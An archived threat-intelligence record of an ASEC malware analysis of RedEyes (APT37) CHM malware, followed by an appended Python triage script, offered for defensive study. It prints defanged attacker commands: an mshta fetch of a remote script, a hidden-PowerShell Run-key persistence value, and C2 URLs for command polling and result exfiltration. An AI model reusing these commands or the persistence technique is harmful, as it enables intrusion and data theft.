{
	"id": "72a95023-e23e-4b65-85a8-3f4592215408",
	"created_at": "2026-04-06T00:11:03.299288Z",
	"updated_at": "2026-04-10T13:12:48.621933Z",
	"deleted_at": null,
	"sha1_hash": "12f452cd87477784211c51ad3bb3fe992a661af4",
	"title": "CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1590181,
	"plain_text": "CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft) - ASEC\r\nBy ATCP\r\nPublished: 2023-03-02 · Archived: 2026-04-05 19:25:54 UTC\r\n\r\nThe ASEC (AhnLab Security Emergency response Center) analysis team has discovered that CHM malware, assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, reported in February, has the same format as the command used in this attack. That earlier report, which also describes the CHM malware’s operation process in detail, is available at https://asec.ahnlab.com/en/48063/\r\n\r\nWhen the CHM file is executed, it displays a Help screen disguised as a security email from a Korean financial company. The malicious script inside the CHM runs during this process, which makes it difficult for users to notice. Malware distribution using CHM files has increased recently.\r\nhttps://asec.ahnlab.com/en/49089/\r\nPage 1 of 4\r\n\r\nThe executed malicious script, like the other CHM malware introduced in the past, uses a shortcut object (ShortCut): the object is invoked through its Click method, and the command under the Item1 entry is executed. Here that command runs an additional script hosted at a certain URL through the mshta process.\r\n\r\nExecuted command: mshta.exe hxxp://shacc[.]kr/skin/product/1.html\r\n\r\nThe “1.html” file executed through the mshta process contains JavaScript (JS) code that runs an encoded PowerShell command. That PowerShell command has a similar format to the command used in the aforementioned M2RAT attack.\r\n\r\nAn examination of the decoded PowerShell command revealed that everything aside from the C2 address, the file name under which the command execution results are saved, and the registry value name is the same code as the command used back in February. The command registers a RUN key to establish persistence, receives commands from the threat actor’s server, and transmits the command execution results.\r\n\r\nRUN Key Registration\r\nRegistry path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: icxrNpVd\r\nValue: c:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html\r\n\r\nC2\r\nhxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // receives the threat actor’s commands\r\nhxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // transmits the command execution results\r\n\r\nA system infected with this type of malware can suffer serious damage, since the malware can perform various malicious actions according to the threat actor’s commands, such as downloading files and stealing information. In particular, malware that targets specific users in Korea may carry content on topics of interest to the target to encourage them to execute it, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also scan their PCs regularly and update their security products to the latest engine.\r\n\r\n[File Detection]\r\nTrojan/CHM.Agent (2023.03.03.03)\r\n\r\nMD5\r\n8d2eebd10d90953cfada64575328ae24\r\n\r\nAdditional IOCs and detailed analysis are available to AhnLab TIP subscribers.\r\n\r\nSource: https://asec.ahnlab.com/en/49089/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/49089/"
	],
	"report_names": [
		"49089"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434263,
	"ts_updated_at": 1775826768,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/12f452cd87477784211c51ad3bb3fe992a661af4.pdf",
		"text": "https://archive.orkl.eu/12f452cd87477784211c51ad3bb3fe992a661af4.txt",
		"img": "https://archive.orkl.eu/12f452cd87477784211c51ad3bb3fe992a661af4.jpg"
	}
}
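Worked example for the three stages the archived post describes: the CHM ShortCut object whose Item1 command launches mshta, the RUN key value that chains cmd.exe, hidden PowerShell, a long ping timeout and mshta, and the mid.php C2 URLs that poll for commands (U=) and upload base64-encoded results (R=). This Python triage script is added here and is not ASEC's code or part of the report. The sample CHM page, the Run-key dump and the two C2 requests are constructed around the command, registry value and URLs the post quotes (kept defanged, hxxp and [.], as printed there); the hhctrl.ocx CLSID and the "whoami" result payload are assumptions, not details from the post.

```python
"""Triage helpers for the CHM -> mshta -> PowerShell chain described above.

Added example, not ASEC's code. Sample inputs are constructed around the mshta
command, Run-key value and C2 URLs the post quotes (kept defanged as printed).
The hhctrl CLSID, sample CHM page and Run-key dump layout are assumptions.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

# HTML Help ShortCut object: Item1 is "<window>,<program>,<arguments>"; Click()
# runs it. CLSID assumed from HTML Help documentation, not stated in the post.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
OBJECT_RE = re.compile(r"<object\b([^>]*)>(.*?)</object>", re.I | re.S)
PARAM_RE = re.compile(r'<param\s+name\s*=\s*"?(\w+)"?\s+value\s*=\s*"([^"]*)"', re.I)
CLICK_RE = re.compile(r"(\w+)\.Click\s*\(", re.I)
ID_RE = re.compile(r'\bid\s*=\s*"?(\w+)', re.I)

# Constructed CHM topic page: decoy text plus a 1x1 ShortCut object.
SAMPLE_CHM_PAGE = """<html><body><p>Security mail notice (decoy body)</p>
<object id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="1">
  <param name="Command" value="ShortCut">
  <param name="Item1" value=",mshta.exe,hxxp://shacc[.]kr/skin/product/1.html">
</object><script>x.Click();</script></body></html>"""


def extract_shortcut_commands(html):
    """Return program/arguments of every ShortCut object in one CHM HTML page."""
    clicked = {name.lower() for name in CLICK_RE.findall(html)}
    hits = []
    for attrs, body in OBJECT_RE.findall(html):
        params = {k.lower(): v for k, v in PARAM_RE.findall(body)}
        if params.get("command", "").lower() != "shortcut":
            continue
        ident = ID_RE.search(attrs)
        obj_id = ident.group(1).lower() if ident else ""
        # Pad the split so a short Item1 still unpacks into three fields.
        _, program, args = (params.get("item1", "").split(",", 2) + ["", ""])[:3]
        hits.append({"id": obj_id, "program": program.strip(), "args": args.strip(),
                     "clicked_by_script": obj_id in clicked,
                     "hhctrl_clsid": HHCTRL_CLSID in attrs.lower()})
    return hits


# Run-key value from the post: cmd.exe -> hidden PowerShell -> "ping -n 1 -w <ms>
# <host> || mshta <url>". With "||", mshta runs only after the ping attempt ends,
# so the long -w timeout acts as a delay when the host does not answer.
MSHTA_URL_RE = re.compile(r"\bmshta(?:\.exe)?\s+((?:https?|hxxps?)://\S+)", re.I)
PING_DELAY_RE = re.compile(r"\bping\s+-n\s+\d+\s+-w\s+(\d+)\s+\S+\s*\|\|", re.I)
HIDDEN_PS_RE = re.compile(r"powershell(?:\.exe)?\b.*?(?:-WindowStyle\s+hidden|-e\w*\s+bypass)", re.I | re.S)


def score_run_value(data):
    """Score one Run-key value's command line; returns (score, reasons)."""
    reasons = []
    url = MSHTA_URL_RE.search(data)
    if url:
        reasons.append("mshta loads a remote HTA: " + url.group(1))
    delay = PING_DELAY_RE.search(data)
    if delay:
        reasons.append(f"ping used as ~{int(delay.group(1)) // 1000}s delay before '||'")
    if HIDDEN_PS_RE.search(data):
        reasons.append("hidden / execution-policy-bypass PowerShell")
    return len(reasons), reasons


def flag_run_values(values, threshold=2):
    """values: iterable of (value name, value data); returns [(name, reasons)]."""
    flagged = []
    for name, data in values:
        score, reasons = score_run_value(data)
        if score >= threshold:
            flagged.append((name, reasons))
    return flagged


# Constructed Run-key dump; the second entry is the post's value verbatim.
SAMPLE_RUN_VALUES = [
    ("OneDrive", r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    ("icxrNpVd", r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo "
                 r"-NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || "
                 r"mshta hxxp://shacc[.]kr/skin/product/1.html"),
]


def parse_c2_request(url):
    """Classify a mid.php request as a command poll (U=) or a result upload (R=).

    The query is split by hand so the literal '+' in U=<host>+<user> survives
    (parse_qs would turn it into a space) and R= keeps any '=' padding.
    """
    query = urlsplit(url.replace("hxxp", "http").replace("[.]", ".")).query
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    if "R" in params:
        raw = unquote(params["R"])
        raw += "=" * (-len(raw) % 4)  # restore padding stripped in transit
        return {"type": "result", "data": base64.b64decode(raw).decode("utf-8", "replace")}
    if "U" in params:
        return {"type": "poll", "host_user": unquote(params["U"])}
    return {"type": "unknown"}
```

Run `extract_shortcut_commands` over the HTML files pulled out of a suspect CHM (for example after decompiling it with hh.exe -decompile), `flag_run_values` over an export of HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and `parse_c2_request` over proxy log URLs; the R= decoder is what turns the base64 result uploads back into the command output the implant exfiltrated, and the `||` plus long `-w` check catches the delay trick even when the C2 host changes.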